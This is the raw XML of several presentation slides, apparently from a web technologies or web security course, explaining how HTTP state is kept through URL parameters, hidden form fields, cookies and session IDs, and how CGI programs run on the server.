                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>="0"&gt;&lt;/iframe&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2011224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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Maintaining State</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="926723" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTP is a stateless protocol</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Many web applications require that state be maintained across requests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This can be achieved through a number of different means</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Embedding information in the returned page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Modified URLs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hidden fields in forms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Using cookies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28758986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ChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Embedding Information in URLs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="927747" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When a user requests a page, the application embeds user-specific information in every link contained in the page returned to the user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Client request:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>GET /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>login.php?user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>foo&amp;pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>=bar HTTP/1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Server reply:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>	&lt;html&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>	...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>	&lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>=“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>catalog.php?user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>=foo”&gt;Catalog&lt;/a&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>	...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>	&lt;/html&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3105297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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Embedding Information in Forms</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="928771" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If a user has to go through a number of forms, information can be carried through using hidden input tags</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Client request: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>GET /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>login.php?user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>foo&amp;pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>=bar HTTP/1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Server reply:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>&lt;html&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>... &lt;form&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>&lt;input type=“hidden” name=“user” value=“foo” /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>&lt;input type=“submit” value=“Press here to see the catalog” /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When the user presses on the form’s button, the string “user=foo” is sent together with the rest of the form’s contents</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1485731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ChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Sessions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="871427" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sessions are used to represent a time-limited interaction of a user with a web server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>There is no concept of a “session” at the HTTP level, and therefore it has to be implemented at the web-application level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Using cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Using URL parameters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Using hidden form fields</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>At the beginning of a session a unique ID is generated and returned to the user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>From that point on, the session ID is used to index the information stored on the server side </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38919088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Code on the Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The server-side component of an application executes code in reaction to an HTTP request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This simple mechanism allows for the creation of web-based portal to databases and other applications</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28180193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a:t>The Common Gateway Interface</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="662531" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>First mechanism to invoke programs on the server side </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The program’s output is returned to the client</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Input parameters can be passed </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Using the URL (GET method)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Advantage: The query can be stored as a URL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Using the request body (POST method)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Advantage: Input parameters can be of any size</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="662532" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="915001" y="3777366"/>
            <a:ext cx="5744862" cy="277641"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="92075" tIns="46038" rIns="92075" bIns="46038">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="762000" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>www.ms.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>cgi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>-bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>prg.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>info?choice</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>yes&amp;q</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>=high</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="662533" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3374231" y="4598970"/>
            <a:ext cx="872710" cy="308419"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="92075" tIns="46038" rIns="92075" bIns="46038">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="762000" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Program</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="662534" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4409760" y="4430947"/>
            <a:ext cx="1105108" cy="739306"/>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defTabSz="762000" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Extra</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" defTabSz="762000" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" defTabSz="762000" eaLnBrk="0" hangingPunct="0"/>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="662535" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2021757" y="4491807"/>
            <a:ext cx="904094" cy="739306"/>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defTabSz="762000" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>CGI </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" defTabSz="762000" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Directory </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" defTabSz="762000" eaLnBrk="0" hangingPunct="0"/>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="662536" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5787678" y="4528290"/>
            <a:ext cx="1037957" cy="308419"/>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defTabSz="762000" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Query data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="662537" name="Freeform 9"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2569586" y="4011985"/>
            <a:ext cx="767923" cy="159965"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="0" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="144"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="676" y="144"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="676" y="0"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b"/>
            <a:pathLst>
              <a:path w="677" h="145">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="144"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="676" y="144"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="676" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="12700" cap="rnd" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="662538" name="Freeform 10"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3374232" y="4002829"/>
            <a:ext cx="657362" cy="180605"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="0" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="144"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="676" y="144"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="676" y="0"/>
              </a:cxn>
